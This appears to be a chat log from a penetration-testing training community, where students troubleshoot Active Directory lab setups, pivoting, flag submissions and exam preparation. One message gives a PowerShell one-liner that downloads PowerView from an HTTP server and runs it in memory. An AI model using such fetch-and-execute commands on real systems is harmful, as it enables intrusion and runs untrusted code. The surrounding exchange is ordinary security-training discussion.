Alright, perfect. Updating my #1371878642954665995 report to include this information so they can put the correct credentials in the module.
Hi,
Im in AD enumeration and attacks. I have sshed into parrot machine. When im trying to clone Kerbrute, it’s giving me fatal error
Are you trying to clone Kerbrute on the target Parrot machine? Because that machine is airgapped. You need to clone it either on the PwnBox or on your own machine and scp -r it to the jump box.
Bro 😭 where did you go?
As per the lab setup its our machine connected to client AD environment, enumeration has to be done from this machine right?
If you don't have a Ligolo or Chisel pivot set up. If you do then it's easier to just use it. Again, however, that Parrot jump machine has no Internet connection. You need to clone it to something else and use SSH to copy the cloned files from the PwnBox or your VM to the jump box.
Something like scp -r kerbrute htb-student@<jump-IP>:~/kerbrute is what you need to do after cloning it to your own machine (or the PwnBox if you prefer that).
Yes or you can add a pivot
Okay thanks guys 🙂
I thought something was wrong because i am just following the module
Step by step
hey guys I am doing windows fundamentals in the Windows Services section there is a big list of services and some data do I need to remember all of them
When I did that module I just proxychainsed it (this was before I learned how to use Ligolo). Might be easier.
this one
is it necessary to remember this kinda stuff in the modules or it's there just to show as an example
Taking a screenshot of that and pasting it into notes is fine. That is, however, stuff that will help you later on, so it's best to have that ready to pull up when you need it.
You definitely don't have to memorize all of that, only know that they exist
in terms of memorization since u are already done with cpts, what things did u memorize and which ones udidnt, how do u classify them
also how long u took to prep for cpts
Can't answer that without spoiling the exam unfortunately. And it took me a semester as the YouTube video link in my bio explains.
Bro I turn spawn machine and type in the browser everything what the instruction says and then it doesn’t want to upload the page
Honestly not sure what to do cant move any further and I purchased this course and would love to finish it
I need some assistance with the Java Obfuscation Module. I have the flag for the HTTP Requests section, but its saying that its incorrect. The flag I have looks like this: HTB{xxxx_xxxxxxx_xxxxxx_xxxxxx}
Are you connected to the vpn?
no
Or are you using pwnbox
Can you read the file to confirm it’s right or have anything wrong while transferring the file?
Going to start password modules with a study partner section soon lol
You can also import it via IEX directly from an HTTP server
IEX (New-Object Net.WebClient).DownloadString('https://10.10.14.100:8000/powerview.ps1');
in Advanced Deserialization Attacks -> ObjectDataProvider Gadget -> XML Example:
the author keeps referring to objects and whether they can be serialized with XmlSerializer object although the latter is only used for deserialization
is this just a general way of explaining and the author is expecting us to understand that if XmlSerializer cannot serialize an object then it automatically cannot deserialize it ?
because it gets confusing when trying to follow up
did anyone do the linux priv esc skills assessment? Keep getting the following message everytime I ssh to the target and despite resetting the connection multiple times, I still get the same message: apclient_loop: send disconnect: Broken pipe
non-usable lab lol
probably, i only remember -w
Damn, I wasted 8 hours trying to find the Firewall and IDS/IPS Evasion flag - Hard Lab I learned something today, even if I have to read the module 50 or 5 thousand times, I'll reread it for the love of god
But I learned
I used 30 when i did it
Passwd, Shadow & Opasswd
For anyone else that may get stuck on this lab ^, either the password or the hash for the account that is to be targeted didn't generate properly and I got stuck here for awhile. I restarted the VM and the hash changed and did nothing else to change my process, and then was able to crack the hash. Worth trying if you get stuck like I did.
just a question about Pwnboxes:
for some reason paste from host to pwnbox doesnt work out at all, Im using firefox
I even tried to change config files, still no results, if I try chrome it works, I even looked at the logs and it says “failed to save clipboard”, I cleared the cache and even disabled browser extensions
any ideas to try? I believe no one else has this problem
not confusing at all